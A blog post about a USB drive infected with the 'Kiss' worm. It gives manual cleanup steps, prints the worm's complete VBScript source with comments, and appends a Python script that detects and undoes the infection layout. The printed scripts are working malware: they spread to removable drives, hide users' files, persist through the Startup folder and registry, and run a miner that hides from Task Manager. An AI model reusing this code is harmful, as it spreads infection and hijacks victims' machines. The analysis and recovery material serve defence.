First time my USB drive has caught a virus... a little exciting, honestly. Stayed up half the night just to figure out what this virus does.
After I plugged the drive in, the first thing to react was 360, which flagged it. At first I ignored 360, assumed it was a false positive, and closed it. Then I opened the drive and found that none of the files were missing, but every one of them had an extra .exe extension. Instinctively I deleted the .exe, and got the error "a file with the same name already exists". Something that abnormal meant the drive was definitely infected, so I ejected it and rebooted, and found the computer itself was not affected. I looked the symptoms up online and they basically matched the "Kiss" virus: the real folders had only been hidden, not deleted. Another clue is that the drive's free space showed the files had not actually been deleted, so recovery was possible. And credit where it is due, 360 does a decent job: one click and the virus was cleaned up...
360 scan result:
Trojan horse...
This virus is really not very powerful, but how it works is still worth summarizing.
Characteristics:
The virus copies itself onto the USB drive. When antivirus software tries to remove it, it sets every folder on the drive to "system, hidden", then creates EXE files with the same names as the folders. The antivirus deletes those EXE files, which creates the illusion that the user's files were deleted.
Fix:
First scan the drive with antivirus. Then in Explorer choose Tools -> Folder Options, open the View tab, and under Advanced settings select "Show all files and folders", then click OK.
Start -> Run -> type "cmd" -> Enter
Change the current directory to the USB drive; for example, if the drive is F:, type "F:" and press Enter
Type "dir /a" and press Enter; this lists every file and folder on the drive, hidden ones included.
Type "attrib -a -s -r -h /d /s *.*" and press Enter
What "attrib -a -s -r -h /d /s *.*" does: it changes file attributes (-a clears the archive attribute, -s clears the system attribute, -r clears the read-only attribute, -h clears the hidden attribute, /s applies the change to matching files in the current directory and all subdirectories, /d applies attrib and its options to directories as well), so all the hidden folders reappear. But it does not really help: eject the drive, plug it back in, and everything is back the way it was.
Kiss source:
Entry point:
%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
installer.vbs
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'Subscribe to logical-disk creation/deletion events
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
    'Check whether helper.vbs is running; if not, start helper.vbs
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    call procheck(colProcess, "helper.vbs")
    'Block until the next disk event arrives
    Set objEvent = colEvents.NextEvent
    If objEvent.TargetInstance.DriveType = 2 Then
        If objEvent.Path_.Class = "__InstanceCreationEvent" Then
            'A removable drive has just been plugged in
            device = objEvent.TargetInstance.DeviceID
            devicename = objEvent.TargetInstance.VolumeName
            DestFolder = device & "\WindowsServices"
            DummyFolder = device & "\" & "_"
            'Create the target directory (\WindowsServices) in the drive root
            if (not objws.folderexists(DestFolder)) then
                objws.CreateFolder DestFolder
                Set objDestFolder = objws.GetFolder(DestFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 39
            end if
            'Copy the four virus files into the target directory (moveandhide actually copies) and hide them
            Call moveandhide ("\helper.vbs")
            Call moveandhide ("\installer.vbs")
            Call moveandhide ("\movemenoreg.vbs")
            Call moveandhide ("\WindowsServices.exe")
            'Create a shortcut in the drive root that opens movemenoreg.vbs
            if (not objws.fileexists (device & devicename & ".lnk")) then
                Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
                link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
                link.TargetPath = "%COMSPEC%"
                link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
                link.windowstyle = 7
                link.Save
            End If
            'Create a directory named "_" in the drive root and hide it
            if (not objws.folderexists(DummyFolder)) then
                objws.CreateFolder DummyFolder
                Set objDestFolder = objws.GetFolder(DummyFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
            End If
            set check = objws.getFolder(device)
            'Move all of the user's files and folders into the "_" directory
            Call checker(check)
        End If
    End If
Wend
sub checker (path)
    set home = path.Files
    For Each file in home
        Select Case file.Name
            Case devicename & ".lnk"
                'nothings
            Case Else
                objws.MoveFile path & file.Name, DummyFolder & "\"
        End Select
    Next
    set home = path.SubFolders
    For Each home in home
        Select Case home
            Case path & "_"
                'nothings
            Case path & "WindowsServices"
                'nothings
            Case path & "System Volume Information"
                'nothings'
            Case Else
                objws. MoveFolder home, DummyFolder & "\"
        End Select
    Next
end sub
sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)
        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if
    end if
end sub
sub procheck(checkme, procname)
    For Each objProcess In checkme
        vaprocess = objProcess.CommandLine
        if instr(vaprocess, procname) then
            Exit sub
        End if
    Next
    ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub
helper.vbs
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'Get the path of the user's Startup folder
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
    'Check whether the registry has already been modified; if not, modify the startup entry
    key = Empty
    key = ws.regread (nkey)
    If (not IsEmpty(key)) then
        ws.RegWrite nkey, 2, "REG_BINARY"
    End if
    If (not objws.fileexists(startupPath & "\helper.lnk")) then
        'Create a startup shortcut for helper.vbs in the Startup folder
        Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
        link.Description = "helper"
        link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
        link.WorkingDirectory = strPath
        link.Save
    End If
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    'Check whether installer.vbs is running; if not, start installer.vbs
    call procheck(colProcess, "installer.vbs")
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
    Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
    if colProcess.count = 0 And tskProcess.count = 0 then
        'Run WindowsServices.exe
        ws.Run miner, 0
    ElseIf colProcess.count > 0 And tskProcess.count > 0 then
        'If the user has opened Task Manager, kill WindowsServices.exe
        For Each objProcess In colProcess
            ws.run "taskkill /PID " & objProcess.ProcessId , 0
        Next
    end if
    WScript.Sleep 3000
Wend
sub procheck(checkme, procname)
    For Each objProcess In checkme
        vaprocess = objProcess.CommandLine
        if instr(vaprocess, procname) then
            Exit sub
        End if
    Next
    ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
movemenoreg.vbs
'On error, continue with the next statement
on error resume next
'Declare the variables
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'Get WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'Open the directory named "_" in the drive root, i.e. where the user's files really are
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'Chr(34) is a double quote
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
'Create the target directory, i.e. %AppData%\WindowsServices
if (not objws.folderexists(DestFolder)) then
    objws.CreateFolder DestFolder
    Set objDestFolder = objws.GetFolder(DestFolder)
end if
'Copy the four virus files into the target directory and hide them, then hide the target directory
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39
sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        'Copy the file
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)
        'Hide the file (39 = read-only 1 + hidden 2 + system 4 + archive 32)
        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if
    end if
end sub
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'Check the process list for a running helper.vbs; if it is already running, exit this script
For Each objProcess In colProcess
    vaprocess = objProcess.CommandLine
    if instr(vaprocess, "helper.vbs") then
        WScript.quit
    End if
Next
'Run helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing
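Putting the Fix section and the three scripts together: installer.vbs leaves a fixed layout on every removable drive (a hidden+system "WindowsServices" folder with the four files, a hidden+system "_" folder holding the user's real files, and a "<VolumeName>.lnk" in the root that runs movemenoreg.vbs through %COMSPEC%), and the attrib command only undoes the attribute part. The Python script below is an added example written for this post, not code from the original post or from the worm: it detects that layout on a drive root, moves the user's files back out of "_", quarantines the dropper folder and the .lnk files instead of deleting them, and clears the four attribute bits the same way attrib -a -s -r -h does. The folder and file names come from the scripts above; the function names, the quarantine folder name and the sample tree it builds in a temporary directory are assumptions made for the example. The decode_attributes helper also shows why the scripts add 39 (1 + 2 + 4 + 32) to a file's attributes.

```python
"""Triage and recovery for a USB drive carrying the 'Kiss' layout (added example)."""
import os
import shutil
import sys
import tempfile
from pathlib import Path

# Windows file-attribute bits; the VBScript's "+ 39" is these four bits added together.
ATTR_READONLY, ATTR_HIDDEN, ATTR_SYSTEM, ATTR_ARCHIVE = 1, 2, 4, 32
ATTR_NAMES = {ATTR_READONLY: "read-only", ATTR_HIDDEN: "hidden",
              ATTR_SYSTEM: "system", ATTR_ARCHIVE: "archive"}

# Names taken from installer.vbs / helper.vbs / movemenoreg.vbs above.
DROPPER_FOLDER = "WindowsServices"
DUMMY_FOLDER = "_"                  # where installer.vbs moves the user's files
DROPPER_FILES = {"helper.vbs", "installer.vbs", "movemenoreg.vbs", "WindowsServices.exe"}
QUARANTINE = "_kiss_quarantine"     # hypothetical folder name chosen for this example


def decode_attributes(mask):
    """Name the bits in an attribute mask: 39 -> read-only, hidden, system, archive."""
    return [name for bit, name in ATTR_NAMES.items() if mask & bit]


def detect_kiss_layout(root):
    """Report which of the worm's on-disk indicators exist under a drive root."""
    root = Path(root)
    dropper, dummy = root / DROPPER_FOLDER, root / DUMMY_FOLDER
    present = {f for f in DROPPER_FILES if (dropper / f).is_file()}
    # installer.vbs drops <VolumeName>.lnk in the root, pointing cmd at movemenoreg.vbs.
    lnks = sorted(p.name for p in root.iterdir() if p.suffix.lower() == ".lnk")
    return {
        "dropper_folder": dropper.is_dir(),
        "dropper_files": sorted(present),
        "dummy_folder": dummy.is_dir(),
        "root_lnk_files": lnks,
        "infected": dropper.is_dir() and bool(present) and dummy.is_dir(),
    }


def clear_attributes(path):
    """Per-path equivalent of `attrib -a -s -r -h`; a no-op off Windows."""
    if sys.platform != "win32":
        return
    import ctypes  # Windows-only code path
    current = os.stat(path).st_file_attributes
    wanted = current & ~(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM | ATTR_ARCHIVE)
    # FILE_ATTRIBUTE_NORMAL (0x80) is the only legal way to say "no attributes at all".
    if not ctypes.windll.kernel32.SetFileAttributesW(str(path), wanted or 0x80):
        raise ctypes.WinError()


def recover_usb(root):
    """Move the user's files out of `_`, quarantine dropper and shortcuts, unhide everything.

    Returns the names restored to the root. Existing root entries are never overwritten.
    """
    root = Path(root)
    dummy = root / DUMMY_FOLDER
    restored = []
    if dummy.is_dir():
        for item in sorted(dummy.iterdir()):
            target = root / item.name
            if target.exists():      # leave name collisions for manual review
                continue
            shutil.move(str(item), str(target))
            restored.append(item.name)
        if not any(dummy.iterdir()):
            dummy.rmdir()
    quarantine = root / QUARANTINE
    quarantine.mkdir(exist_ok=True)
    dropper = root / DROPPER_FOLDER
    if dropper.is_dir():
        shutil.move(str(dropper), str(quarantine / DROPPER_FOLDER))
    for lnk in list(root.glob("*.lnk")):
        shutil.move(str(lnk), str(quarantine / lnk.name))
    for path in root.rglob("*"):
        clear_attributes(path)
    return restored


def build_sample_infection(root):
    """Constructed layout mirroring what installer.vbs leaves behind (placeholder content only)."""
    root = Path(root)
    (root / DROPPER_FOLDER).mkdir()
    for name in DROPPER_FILES:
        (root / DROPPER_FOLDER / name).write_text("' placeholder, not the real script\n")
    (root / DUMMY_FOLDER / "photos").mkdir(parents=True)
    (root / DUMMY_FOLDER / "photos" / "img1.jpg").write_bytes(b"\xff\xd8 constructed")
    (root / DUMMY_FOLDER / "thesis.docx").write_bytes(b"constructed user data")
    (root / "MYUSB.lnk").write_bytes(b"constructed placeholder shortcut")


def run_demo():
    """Build the sample drive in a temp dir, triage it, recover it, triage again."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_infection(tmp)
        before = detect_kiss_layout(tmp)
        restored = recover_usb(tmp)
        after = detect_kiss_layout(tmp)
    return before, restored, after


if __name__ == "__main__":
    before, restored, after = run_demo()
    print("before:", before)
    print("restored:", restored)
    print("after:", after)
```

Run it against a real drive with detect_kiss_layout("F:\\") first and recover_usb("F:\\") only once the report says infected; the attribute reset only does anything on Windows, the file moves work anywhere. Cleaning the drive alone will not stick, which is exactly what the post observes after replugging: helper.vbs and installer.vbs keep running on the host from %AppData%\WindowsServices and re-hide everything on the next insertion, so the wscript.exe processes, the helper.lnk in the Startup folder and the StartupApproved registry value from helper.vbs have to go first.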